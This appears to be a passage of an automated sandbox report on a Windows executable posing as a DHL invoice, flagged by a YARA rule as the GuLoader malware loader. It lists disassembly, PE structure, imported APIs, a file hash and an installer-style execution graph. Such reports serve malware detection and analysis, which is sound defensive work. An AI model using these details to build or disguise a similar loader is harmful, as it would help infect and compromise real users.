                                      mov dword ptr [00423704h], eax
                                      call 00007F19289E622Ch
                                      cmp eax, ebx
                                      je 00007F19289E3181h
                                      push 0000001Eh
                                      call eax
                                      test eax, eax
                                      je 00007F19289E3179h
                                      or byte ptr [0042370Fh], 00000040h
                                      push ebp
                                      call dword ptr [00407040h]
                                      push ebx
                                      call dword ptr [00407284h]
                                      mov dword ptr [004237D8h], eax
                                      push ebx
                                      lea eax, dword ptr [esp+38h]
                                      push 00000160h
                                      push eax
                                      push ebx
                                      push 0041ECC8h
                                      call dword ptr [00407178h]
                                      push 00409188h
                                      Programming Language:
                                      • [EXP] VC++ 6.0 SP5 build 8804
                                      NameVirtual AddressVirtual Size Is in Section
                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x74300xa0.rdata
                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x360000x1e3f8.rsrc
                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                      IMAGE_DIRECTORY_ENTRY_SECURITY0xc13300x22b0
                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IAT0x70000x294.rdata
                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                      .text0x10000x5f7d0x6000False0.6680094401041666data6.466064816043304IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                      .rdata0x70000x123e0x1400False0.4275390625data4.989734782278587IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                      .data0x90000x1a8180x400False0.638671875data5.130817636118804IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      .ndata0x240000x120000x0False0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      .rsrc0x360000x1e3f80x1e400False0.26598011363636365data3.27208167704045IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                      NameRVASizeTypeLanguageCountry
                                      RT_ICON0x362f80x10828Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 5905 x 5905 px/mEnglishUnited States
                                      RT_ICON0x46b200x537dPNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States
                                      RT_ICON0x4bea00x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16384, resolution 5905 x 5905 px/mEnglishUnited States
                                      RT_ICON0x500c80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 5905 x 5905 px/mEnglishUnited States
                                      RT_ICON0x526700x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 5905 x 5905 px/mEnglishUnited States
                                      RT_ICON0x537180x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 5905 x 5905 px/mEnglishUnited States
                                      RT_DIALOG0x53b800x100dataEnglishUnited States
                                      RT_DIALOG0x53c800x11cdataEnglishUnited States
                                      RT_DIALOG0x53da00xc4dataEnglishUnited States
                                      RT_DIALOG0x53e680x60dataEnglishUnited States
                                      RT_GROUP_ICON0x53ec80x5adataEnglishUnited States
                                      RT_VERSION0x53f280x190dataEnglishUnited States
                                      RT_MANIFEST0x540b80x33eXML 1.0 document, ASCII text, with very long lines (830), with no line terminatorsEnglishUnited States
                                      DLLImport
                                      KERNEL32.dllGetTempPathA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, SetEnvironmentVariableA, Sleep, GetTickCount, GetCommandLineA, lstrlenA, GetVersion, SetErrorMode, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GetWindowsDirectoryA, SetFileAttributesA, GetLastError, CreateDirectoryA, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, ReadFile, WriteFile, lstrcpyA, MoveFileExA, lstrcatA, GetSystemDirectoryA, GetProcAddress, GetExitCodeProcess, WaitForSingleObject, CompareFileTime, SetFileTime, GetFileAttributesA, SetCurrentDirectoryA, MoveFileA, GetFullPathNameA, GetShortPathNameA, SearchPathA, CloseHandle, lstrcmpiA, CreateThread, GlobalLock, lstrcmpA, DeleteFileA, FindFirstFileA, FindNextFileA, FindClose, SetFilePointer, GetPrivateProfileStringA, WritePrivateProfileStringA, MulDiv, MultiByteToWideChar, FreeLibrary, LoadLibraryExA, GetModuleHandleA, GlobalAlloc, GlobalFree, ExpandEnvironmentStringsA
                                      USER32.dllGetSystemMenu, SetClassLongA, EnableMenuItem, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, ScreenToClient, GetWindowRect, GetDlgItem, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, EndDialog, RegisterClassA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, LoadImageA, CreateDialogParamA, SetTimer, SetWindowTextA, SetForegroundWindow, ShowWindow, SetWindowLongA, SendMessageTimeoutA, FindWindowExA, IsWindow, AppendMenuA, TrackPopupMenu, CreatePopupMenu, DrawTextA, EndPaint, DestroyWindow, wsprintfA, PostQuitMessage
                                      GDI32.dllSelectObject, SetTextColor, SetBkMode, CreateFontIndirectA, CreateBrushIndirect, DeleteObject, GetDeviceCaps, SetBkColor
                                      SHELL32.dllSHGetSpecialFolderLocation, ShellExecuteExA, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, SHFileOperationA
                                      ADVAPI32.dllAdjustTokenPrivileges, RegCreateKeyExA, RegOpenKeyExA, SetFileSecurityA, OpenProcessToken, LookupPrivilegeValueA, RegEnumValueA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
                                      COMCTL32.dllImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                      ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance
                                      Language of compilation systemCountry where language is spokenMap
                                      EnglishUnited States
                                      Report size exceeds maximum size, go to the download page of this report and download PCAP to see all network behavior.

                                      Click to jump to process

                                      Click to jump to process

                                      Click to dive into process behavior distribution

                                      Target ID:0
                                      Start time:11:37:11
                                      Start date:20/03/2023
                                      Path:C:\Users\user\Desktop\DHLINV000156.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Users\user\Desktop\DHLINV000156.exe
                                      Imagebase:0x400000
                                      File size:800224 bytes
                                      MD5 hash:4CEF4C9B4785B2BC5ADCBF1C91185AB9
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.784930526.0000000004BAA000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                      Reputation:low

                                      Reset < >

                                        Execution Graph

                                        Execution Coverage:20%
                                        Dynamic/Decrypted Code Coverage:0%
                                        Signature Coverage:17.1%
                                        Total number of Nodes:1529
                                        Total number of Limit Nodes:43
                                        execution_graph 5091 401d41 5092 401d54 GetDlgItem 5091->5092 5093 401d47 5091->5093 5095 401d4e 5092->5095 5094 402b0a 17 API calls 5093->5094 5094->5095 5096 401d8f GetClientRect LoadImageA SendMessageA 5095->5096 5097 402b2c 17 API calls 5095->5097 5099 401deb 5096->5099 5101 4029b8 5096->5101 5097->5096 5100 401df3 DeleteObject 5099->5100 5099->5101 5100->5101 4056 401746 4062 402b2c 4056->4062 4060 401754 4061 405ba2 2 API calls 4060->4061 4061->4060 4063 402b38 4062->4063 4072 405ffc 4063->4072 4066 40174d 4068 405ba2 4066->4068 4069 405bad GetTickCount GetTempFileNameA 4068->4069 4070 405bde 4069->4070 4071 405bda 4069->4071 4070->4060 4071->4069 4071->4070 4086 406009 4072->4086 4073 402b59 4073->4066 4089 406244 4073->4089 4074 40622b 4074->4073 4105 405fda lstrcpynA 4074->4105 4076 406205 lstrlenA 4076->4086 4078 405ffc 10 API calls 4078->4076 4081 406121 GetSystemDirectoryA 4081->4086 4082 406134 GetWindowsDirectoryA 4082->4086 4083 406244 5 API calls 4083->4086 4084 405ffc 10 API calls 4084->4086 4085 4061ae lstrcatA 4085->4086 4086->4074 4086->4076 4086->4078 4086->4081 4086->4082 4086->4083 4086->4084 4086->4085 4087 406168 SHGetSpecialFolderLocation 4086->4087 4098 405ec1 4086->4098 4103 405f38 wsprintfA 4086->4103 4104 405fda lstrcpynA 4086->4104 4087->4086 4088 406180 SHGetPathFromIDListA CoTaskMemFree 4087->4088 4088->4086 4095 406250 4089->4095 4090 4062b8 4091 4062bc CharPrevA 4090->4091 4094 4062d7 4090->4094 4091->4090 4092 4062ad CharNextA 4092->4090 4092->4095 4094->4066 4095->4090 4095->4092 4096 40629b CharNextA 4095->4096 4097 4062a8 CharNextA 4095->4097 4110 40599d 4095->4110 4096->4095 4097->4092 4106 405e60 4098->4106 4101 405f24 4101->4086 4102 405ef5 RegQueryValueExA RegCloseKey 4102->4101 4103->4086 4104->4086 4105->4073 4107 405e6f 4106->4107 4108 405e73 4107->4108 4109 405e78 RegOpenKeyExA 4107->4109 4108->4101 4108->4102 4109->4108 4111 4059a3 4110->4111 4112 4059b6 4111->4112 4113 4059a9 CharNextA 4111->4113 4112->4095 4113->4111 5102 401947 5103 402b2c 17 API calls 5102->5103 5104 40194e lstrlenA 5103->5104 5105 4025e4 5104->5105 5106 401fc8 5107 402b2c 17 API calls 5106->5107 5108 401fcf 5107->5108 5109 406372 5 API calls 5108->5109 5110 401fde 5109->5110 5111 401ff6 GlobalAlloc 5110->5111 5112 40205e 5110->5112 5111->5112 5113 40200a 5111->5113 5114 406372 5 API calls 5113->5114 5115 402011 5114->5115 5116 406372 5 API calls 5115->5116 5117 40201b 5116->5117 5117->5112 5121 405f38 wsprintfA 5117->5121 5119 402052 5122 405f38 wsprintfA 5119->5122 5121->5119 5122->5112 5123 4025c8 5124 402b2c 17 API calls 5123->5124 5125 4025cf 5124->5125 5128 405b73 GetFileAttributesA CreateFileA 5125->5128 5127 4025db 5128->5127 5139 40484b 5140 404877 5139->5140 5141 40485b 5139->5141 5143 4048aa 5140->5143 5144 40487d SHGetPathFromIDListA 5140->5144 5150 4056da GetDlgItemTextA 5141->5150 5146 404894 SendMessageA 5144->5146 5147 40488d 5144->5147 5145 404868 SendMessageA 5145->5140 5146->5143 5148 40140b 2 API calls 5147->5148 5148->5146 5150->5145 4374 40254c 4386 402b6c 4374->4386 4378 40255f 4379 402783 4378->4379 4380 40256d 4378->4380 4381 402586 RegEnumValueA 4380->4381 4382 40257a RegEnumKeyA 4380->4382 4383 4025a2 RegCloseKey 4381->4383 4384 40259b 4381->4384 4382->4383 4383->4379 4384->4383 4387 402b2c 17 API calls 4386->4387 4388 402b83 4387->4388 4389 405e60 RegOpenKeyExA 4388->4389 4390 402556 4389->4390 4391 402b0a 4390->4391 4392 405ffc 17 API calls 4391->4392 4393 402b1f 4392->4393 4393->4378 5151 73ef2be3 5152 73ef2bfb 5151->5152 5153 73ef1534 2 API calls 5152->5153 5154 73ef2c16 5153->5154 5155 73ef10e0 5156 73ef110e 5155->5156 5157 73ef11c4 GlobalFree 5156->5157 5158 73ef12ad 2 API calls 5156->5158 5159 73ef11c3 5156->5159 5160 73ef1266 2 API calls 5156->5160 5161 73ef1155 GlobalAlloc 5156->5161 5162 73ef11ea GlobalFree 5156->5162 5163 73ef12d1 lstrcpyA 5156->5163 5164 73ef11b1 GlobalFree 5156->5164 5158->5156 5159->5157 5160->5164 5161->5156 5162->5156 5163->5156 5164->5156 5165 4041d3 5166 4042f5 5165->5166 5167 4041e9 5165->5167 5168 404364 5166->5168 5172 40442e 5166->5172 5175 404339 GetDlgItem SendMessageA 5166->5175 5169 404068 18 API calls 5167->5169 5170 40436e GetDlgItem 5168->5170 5168->5172 5171 40423f 5169->5171 5173 404384 5170->5173 5174 4043ec 5170->5174 5176 404068 18 API calls 5171->5176 5177 4040cf 8 API calls 5172->5177 5173->5174 5179 4043aa SendMessageA LoadCursorA SetCursor 5173->5179 5174->5172 5180 4043fe 5174->5180 5198 40408a KiUserCallbackDispatcher 5175->5198 5182 40424c CheckDlgButton 5176->5182 5178 404429 5177->5178 5202 404477 5179->5202 5184 404404 SendMessageA 5180->5184 5185 404415 5180->5185 5196 40408a KiUserCallbackDispatcher 5182->5196 5184->5185 5185->5178 5190 40441b SendMessageA 5185->5190 5186 40435f 5199 404453 5186->5199 5188 40426a GetDlgItem 5197 40409d SendMessageA 5188->5197 5190->5178 5193 404280 SendMessageA 5194 4042a7 SendMessageA SendMessageA lstrlenA SendMessageA SendMessageA 5193->5194 5195 40429e GetSysColor 5193->5195 5194->5178 5195->5194 5196->5188 5197->5193 5198->5186 5200 404461 5199->5200 5201 404466 SendMessageA 5199->5201 5200->5201 5201->5168 5205 4056bc ShellExecuteExA 5202->5205 5204 4043dd LoadCursorA SetCursor 5204->5174 5205->5204 4922 4014d6 4923 402b0a 17 API calls 4922->4923 4924 4014dc Sleep 4923->4924 4926 4029b8 4924->4926 4945 401759 4946 402b2c 17 API calls 4945->4946 4947 401760 4946->4947 4948 401786 4947->4948 4949 40177e 4947->4949 4985 405fda lstrcpynA 4948->4985 4984 405fda lstrcpynA 4949->4984 4952 401784 4956 406244 5 API calls 4952->4956 4953 401791 4954 405972 3 API calls 4953->4954 4955 401797 lstrcatA 4954->4955 4955->4952 4961 4017a3 4956->4961 4957 4062dd 2 API calls 4957->4961 4958 405b4e 2 API calls 4958->4961 4960 4017ba CompareFileTime 4960->4961 4961->4957 4961->4958 4961->4960 4962 40187e 4961->4962 4967 405fda lstrcpynA 4961->4967 4970 405ffc 17 API calls 4961->4970 4977 4056f6 MessageBoxIndirectA 4961->4977 4980 401855 4961->4980 4983 405b73 GetFileAttributesA CreateFileA 4961->4983 4963 405101 24 API calls 4962->4963 4964 401888 4963->4964 4966 402ffb 35 API calls 4964->4966 4965 405101 24 API calls 4981 40186a 4965->4981 4968 40189b 4966->4968 4967->4961 4969 4018af SetFileTime 4968->4969 4971 4018c1 FindCloseChangeNotification 4968->4971 4969->4971 4970->4961 4972 4018d2 4971->4972 4971->4981 4973 4018d7 4972->4973 4974 4018ea 4972->4974 4975 405ffc 17 API calls 4973->4975 4976 405ffc 17 API calls 4974->4976 4978 4018df lstrcatA 4975->4978 4979 4018f2 4976->4979 4977->4961 4978->4979 4979->4981 4982 4056f6 MessageBoxIndirectA 4979->4982 4980->4965 4980->4981 4982->4981 4983->4961 4984->4952 4985->4953 5206 401659 5207 402b2c 17 API calls 5206->5207 5208 40165f 5207->5208 5209 4062dd 2 API calls 5208->5209 5210 401665 5209->5210 5211 401959 5212 402b0a 17 API calls 5211->5212 5213 401960 5212->5213 5214 402b0a 17 API calls 5213->5214 5215 40196d 5214->5215 5216 402b2c 17 API calls 5215->5216 5217 401984 lstrlenA 5216->5217 5219 401994 5217->5219 5218 4019d4 5219->5218 5223 405fda lstrcpynA 5219->5223 5221 4019c4 5221->5218 5222 4019c9 lstrlenA 5221->5222 5222->5218 5223->5221 5231 401cda 5232 402b0a 17 API calls 5231->5232 5233 401ce0 IsWindow 5232->5233 5234 401a0e 5233->5234 5235 4024da 5236 402b6c 17 API calls 5235->5236 5237 4024e4 5236->5237 5238 402b2c 17 API calls 5237->5238 5239 4024ed 5238->5239 5240 4024f7 RegQueryValueExA 5239->5240 5244 402783 5239->5244 5241 40251d RegCloseKey 5240->5241 5242 402517 5240->5242 5241->5244 5242->5241 5246 405f38 wsprintfA 5242->5246 5246->5241 5247 402cdd 5248 402d05 5247->5248 5249 402cec SetTimer 5247->5249 5250 402d5a 5248->5250 5251 402d1f MulDiv wsprintfA SetWindowTextA SetDlgItemTextA 5248->5251 5249->5248 5251->5250 5252 401a5e 5253 402b0a 17 API calls 5252->5253 5254 401a67 5253->5254 5255 402b0a 17 API calls 5254->5255 5256 401a0e 5255->5256 5257 401563 5258 402960 5257->5258 5261 405f38 wsprintfA 5258->5261 5260 402965 5261->5260 5262 401b63 5263 401b70 5262->5263 5264 401bb4 5262->5264 5267 40233b 5263->5267 5271 401b87 5263->5271 5265 401bb8 5264->5265 5266 401bdd GlobalAlloc 5264->5266 5273 401bf8 5265->5273 5283 405fda lstrcpynA 5265->5283 5268 405ffc 17 API calls 5266->5268 5269 405ffc 17 API calls 5267->5269 5268->5273 5274 402348 5269->5274 5281 405fda lstrcpynA 5271->5281 5272 401bca GlobalFree 5272->5273 5274->5273 5277 4056f6 MessageBoxIndirectA 5274->5277 5276 401b96 5282 405fda lstrcpynA 5276->5282 5277->5273 5279 401ba5 5284 405fda lstrcpynA 5279->5284 5281->5276 5282->5279 5283->5272 5284->5273 5285 402363 5286 40236b 5285->5286 5287 402371 5285->5287 5288 402b2c 17 API calls 5286->5288 5289 402b2c 17 API calls 5287->5289 5291 402381 5287->5291 5288->5287 5289->5291 5290 40238f 5293 402b2c 17 API calls 5290->5293 5291->5290 5292 402b2c 17 API calls 5291->5292 5292->5290 5294 402398 WritePrivateProfileStringA 5293->5294 5295 402765 5296 402b2c 17 API calls 5295->5296 5297 40276c FindFirstFileA 5296->5297 5298 40278f 5297->5298 5301 40277f 5297->5301 5303 405f38 wsprintfA 5298->5303 5300 402796 5304 405fda lstrcpynA 5300->5304 5303->5300 5304->5301 5305 406666 5306 4064ea 5305->5306 5307 406e55 5306->5307 5308 406574 GlobalAlloc 5306->5308 5309 40656b GlobalFree 5306->5309 5310 4065e2 GlobalFree 5306->5310 5311 4065eb GlobalAlloc 5306->5311 5308->5306 5308->5307 5309->5308 5310->5311 5311->5306 5311->5307 5312 4063e7 WaitForSingleObject 5313 406401 5312->5313 5314 406413 GetExitCodeProcess 5313->5314 5315 4063ae 2 API calls 5313->5315 5316 406408 WaitForSingleObject 5315->5316 5316->5313 5317 4023e8 5318 40241a 5317->5318 5319 4023ef 5317->5319 5320 402b2c 17 API calls 5318->5320 5321 402b6c 17 API calls 5319->5321 5322 402421 5320->5322 5324 4023f6 5321->5324 5328 402bea 5322->5328 5325 402b2c 17 API calls 5324->5325 5326 40242e 5324->5326 5327 402407 RegDeleteValueA RegCloseKey 5325->5327 5327->5326 5329 402bf6 5328->5329 5330 402bfd 5328->5330 5329->5326 5330->5329 5332 402c2e 5330->5332 5333 405e60 RegOpenKeyExA 5332->5333 5334 402c5c 5333->5334 5335 402c82 RegEnumKeyA 5334->5335 5336 402c99 RegCloseKey 5334->5336 5337 402cba RegCloseKey 5334->5337 5339 402c2e 6 API calls 5334->5339 5342 402cad 5334->5342 5335->5334 5335->5336 5338 406372 5 API calls 5336->5338 5337->5342 5340 402ca9 5338->5340 5339->5334 5341 402cca RegDeleteKeyA 5340->5341 5340->5342 5341->5342 5342->5329 4114 40206a 4115 40207c 4114->4115 4125 40212a 4114->4125 4116 402b2c 17 API calls 4115->4116 4118 402083 4116->4118 4117 401423 24 API calls 4119 4022a9 4117->4119 4120 402b2c 17 API calls 4118->4120 4121 40208c 4120->4121 4122 4020a1 LoadLibraryExA 4121->4122 4123 402094 GetModuleHandleA 4121->4123 4124 4020b1 GetProcAddress 4122->4124 4122->4125 4123->4122 4123->4124 4126 4020c0 4124->4126 4127 4020fd 4124->4127 4125->4117 4128 4020c8 4126->4128 4129 4020df 4126->4129 4180 405101 4127->4180 4177 401423 4128->4177 4135 73ef16db 4129->4135 4132 4020d0 4132->4119 4133 40211e FreeLibrary 4132->4133 4133->4119 4136 73ef170b 4135->4136 4191 73ef1a98 4136->4191 4138 73ef1712 4139 73ef1834 4138->4139 4140 73ef172a 4138->4140 4141 73ef1723 4138->4141 4139->4132 4225 73ef22f1 4140->4225 4242 73ef22af 4141->4242 4146 73ef178e 4150 73ef17dc 4146->4150 4151 73ef1794 4146->4151 4147 73ef1770 4255 73ef24d8 4147->4255 4148 73ef1759 4162 73ef174f 4148->4162 4252 73ef2cc3 4148->4252 4149 73ef1740 4153 73ef1746 4149->4153 4159 73ef1751 4149->4159 4157 73ef24d8 10 API calls 4150->4157 4274 73ef156b 4151->4274 4153->4162 4236 73ef2a38 4153->4236 4163 73ef17cd 4157->4163 4158 73ef1776 4266 73ef1559 4158->4266 4246 73ef26b2 4159->4246 4162->4146 4162->4147 4169 73ef1823 4163->4169 4280 73ef249e 4163->4280 4165 73ef1757 4165->4162 4166 73ef24d8 10 API calls 4166->4163 4169->4139 4171 73ef182d GlobalFree 4169->4171 4171->4139 4174 73ef180f 4174->4169 4284 73ef14e2 wsprintfA 4174->4284 4175 73ef1808 FreeLibrary 4175->4174 4178 405101 24 API calls 4177->4178 4179 401431 4178->4179 4179->4132 4181 40511c 4180->4181 4190 4051bf 4180->4190 4182 405139 lstrlenA 4181->4182 4183 405ffc 17 API calls 4181->4183 4184 405162 4182->4184 4185 405147 lstrlenA 4182->4185 4183->4182 4187 405175 4184->4187 4188 405168 SetWindowTextA 4184->4188 4186 405159 lstrcatA 4185->4186 4185->4190 4186->4184 4189 40517b SendMessageA SendMessageA SendMessageA 4187->4189 4187->4190 4188->4187 4189->4190 4190->4132 4287 73ef1215 GlobalAlloc 4191->4287 4193 73ef1abf 4288 73ef1215 GlobalAlloc 4193->4288 4195 73ef1d00 GlobalFree GlobalFree GlobalFree 4196 73ef1d1d 4195->4196 4209 73ef1d67 4195->4209 4198 73ef20f1 4196->4198 4206 73ef1d32 4196->4206 4196->4209 4197 73ef1bbd GlobalAlloc 4219 73ef1aca 4197->4219 4199 73ef2113 GetModuleHandleA 4198->4199 4198->4209 4200 73ef2139 4199->4200 4201 73ef2124 LoadLibraryA 4199->4201 4295 73ef15c2 GetProcAddress 4200->4295 4201->4200 4201->4209 4202 73ef1c08 lstrcpyA 4205 73ef1c12 lstrcpyA 4202->4205 4203 73ef1c26 GlobalFree 4203->4219 4205->4219 4206->4209 4291 73ef1224 4206->4291 4207 73ef218a 4207->4209 4211 73ef2197 lstrlenA 4207->4211 4208 73ef1fb7 4294 73ef1215 GlobalAlloc 4208->4294 4209->4138 4296 73ef15c2 GetProcAddress 4211->4296 4213 73ef214b 4213->4207 4223 73ef2174 GetProcAddress 4213->4223 4215 73ef1ef9 GlobalFree 4215->4219 4216 73ef2033 4216->4209 4222 73ef208c lstrcpyA 4216->4222 4217 73ef1c64 4217->4219 4289 73ef1534 GlobalSize GlobalAlloc 4217->4289 4218 73ef21b0 4218->4209 4219->4195 4219->4197 4219->4202 4219->4203 4219->4205 4219->4208 4219->4209 4219->4215 4219->4216 4219->4217 4220 73ef1224 2 API calls 4219->4220 4220->4219 4222->4209 4223->4207 4224 73ef1fbf 4224->4138 4233 73ef230a 4225->4233 4227 73ef2446 GlobalFree 4228 73ef1730 4227->4228 4227->4233 4228->4148 4228->4149 4228->4162 4229 73ef23b8 GlobalAlloc MultiByteToWideChar 4231 73ef2405 4229->4231 4232 73ef23e4 GlobalAlloc 4229->4232 4230 73ef1224 GlobalAlloc lstrcpynA 4230->4233 4231->4227 4302 73ef2646 4231->4302 4234 73ef23fc GlobalFree 4232->4234 4233->4227 4233->4229 4233->4230 4233->4231 4298 73ef12ad 4233->4298 4234->4227 4237 73ef2a4a 4236->4237 4238 73ef2aef CreateFileA 4237->4238 4241 73ef2b0d 4238->4241 4240 73ef2bd9 4240->4162 4305 73ef29e4 4241->4305 4243 73ef22c4 4242->4243 4244 73ef22cf GlobalAlloc 4243->4244 4245 73ef1729 4243->4245 4244->4243 4245->4140 4250 73ef26e2 4246->4250 4247 73ef277d GlobalAlloc 4251 73ef27a0 4247->4251 4248 73ef2790 4249 73ef2796 GlobalSize 4248->4249 4248->4251 4249->4251 4250->4247 4250->4248 4251->4165 4253 73ef2cce 4252->4253 4254 73ef2d0e GlobalFree 4253->4254 4309 73ef1215 GlobalAlloc 4255->4309 4257 73ef2598 WideCharToMultiByte 4261 73ef24e4 4257->4261 4258 73ef2563 lstrcpynA 4258->4261 4259 73ef25b9 wsprintfA 4259->4261 4260 73ef25dd GlobalFree 4260->4261 4261->4257 4261->4258 4261->4259 4261->4260 4262 73ef2583 WideCharToMultiByte 4261->4262 4263 73ef2617 GlobalFree 4261->4263 4264 73ef1266 2 API calls 4261->4264 4310 73ef12d1 4261->4310 4262->4261 4263->4158 4264->4261 4314 73ef1215 GlobalAlloc 4266->4314 4268 73ef155e 4269 73ef156b 2 API calls 4268->4269 4270 73ef1568 4269->4270 4271 73ef1266 4270->4271 4272 73ef126f GlobalAlloc lstrcpynA 4271->4272 4273 73ef12a8 GlobalFree 4271->4273 4272->4273 4273->4163 4275 73ef1577 wsprintfA 4274->4275 4276 73ef15a4 lstrcpyA 4274->4276 4279 73ef15bd 4275->4279 4276->4279 4279->4166 4281 73ef24ac 4280->4281 4283 73ef17ef 4280->4283 4282 73ef24c5 GlobalFree 4281->4282 4281->4283 4282->4281 4283->4174 4283->4175 4285 73ef1266 2 API calls 4284->4285 4286 73ef1503 4285->4286 4286->4169 4287->4193 4288->4219 4290 73ef1552 4289->4290 4290->4217 4297 73ef1215 GlobalAlloc 4291->4297 4293 73ef1233 lstrcpynA 4293->4209 4294->4224 4295->4213 4296->4218 4297->4293 4299 73ef12b4 4298->4299 4300 73ef1224 2 API calls 4299->4300 4301 73ef12cf 4300->4301 4301->4233 4303 73ef26aa 4302->4303 4304 73ef2654 VirtualAlloc 4302->4304 4303->4231 4304->4303 4306 73ef29ef 4305->4306 4307 73ef29ff 4306->4307 4308 73ef29f4 GetLastError 4306->4308 4307->4240 4308->4307 4309->4261 4311 73ef12da 4310->4311 4312 73ef12f9 4310->4312 4311->4312 4313 73ef12e0 lstrcpyA 4311->4313 4312->4261 4313->4312 4314->4268 4315 40166a 4316 402b2c 17 API calls 4315->4316 4317 401671 4316->4317 4318 402b2c 17 API calls 4317->4318 4319 40167a 4318->4319 4320 402b2c 17 API calls 4319->4320 4321 401683 MoveFileA 4320->4321 4322 401696 4321->4322 4323 40168f 4321->4323 4327 4022a9 4322->4327 4329 4062dd FindFirstFileA 4322->4329 4324 401423 24 API calls 4323->4324 4324->4327 4330 4062f3 FindClose 4329->4330 4331 4016a5 4329->4331 4330->4331 4331->4327 4332 405db9 MoveFileExA 4331->4332 4333 405dda 4332->4333 4334 405dcd 4332->4334 4333->4323 4336 405c49 4334->4336 4337 405c95 GetShortPathNameA 4336->4337 4338 405c6f 4336->4338 4340 405db4 4337->4340 4341 405caa 4337->4341 4363 405b73 GetFileAttributesA CreateFileA 4338->4363 4340->4333 4341->4340 4343 405cb2 wsprintfA 4341->4343 4342 405c79 CloseHandle GetShortPathNameA 4342->4340 4344 405c8d 4342->4344 4345 405ffc 17 API calls 4343->4345 4344->4337 4344->4340 4346 405cda 4345->4346 4364 405b73 GetFileAttributesA CreateFileA 4346->4364 4348 405ce7 4348->4340 4349 405cf6 GetFileSize GlobalAlloc 4348->4349 4350 405d18 4349->4350 4351 405dad CloseHandle 4349->4351 4365 405beb ReadFile 4350->4365 4351->4340 4356 405d37 lstrcpyA 4359 405d59 4356->4359 4357 405d4b 4358 405ad8 4 API calls 4357->4358 4358->4359 4360 405d90 SetFilePointer 4359->4360 4372 405c1a WriteFile 4360->4372 4363->4342 4364->4348 4366 405c09 4365->4366 4366->4351 4367 405ad8 lstrlenA 4366->4367 4368 405b19 lstrlenA 4367->4368 4369 405b21 4368->4369 4370 405af2 lstrcmpiA 4368->4370 4369->4356 4369->4357 4370->4369 4371 405b10 CharNextA 4370->4371 4371->4368 4373 405c38 GlobalFree 4372->4373 4373->4351 5343 4025ea 5344 402603 5343->5344 5345 4025ef 5343->5345 5347 402b2c 17 API calls 5344->5347 5346 402b0a 17 API calls 5345->5346 5349 4025f8 5346->5349 5348 40260a lstrlenA 5347->5348 5348->5349 5350 405c1a WriteFile 5349->5350 5351 40262c 5349->5351 5350->5351 5352 404a6d GetDlgItem GetDlgItem 5353 404ac3 7 API calls 5352->5353 5354 404cea 5352->5354 5355 404b6b DeleteObject 5353->5355 5356 404b5f SendMessageA 5353->5356 5359 404dcc 5354->5359 5386 404d59 5354->5386 5405 4049bb SendMessageA 5354->5405 5357 404b76 5355->5357 5356->5355 5358 404bad 5357->5358 5362 405ffc 17 API calls 5357->5362 5360 404068 18 API calls 5358->5360 5361 404e78 5359->5361 5364 404cdd 5359->5364 5370 404e25 SendMessageA 5359->5370 5363 404bc1 5360->5363 5365 404e82 SendMessageA 5361->5365 5366 404e8a 5361->5366 5367 404b8f SendMessageA SendMessageA 5362->5367 5369 404068 18 API calls 5363->5369 5371 4040cf 8 API calls 5364->5371 5365->5366 5373 404ea3 5366->5373 5374 404e9c ImageList_Destroy 5366->5374 5382 404eb3 5366->5382 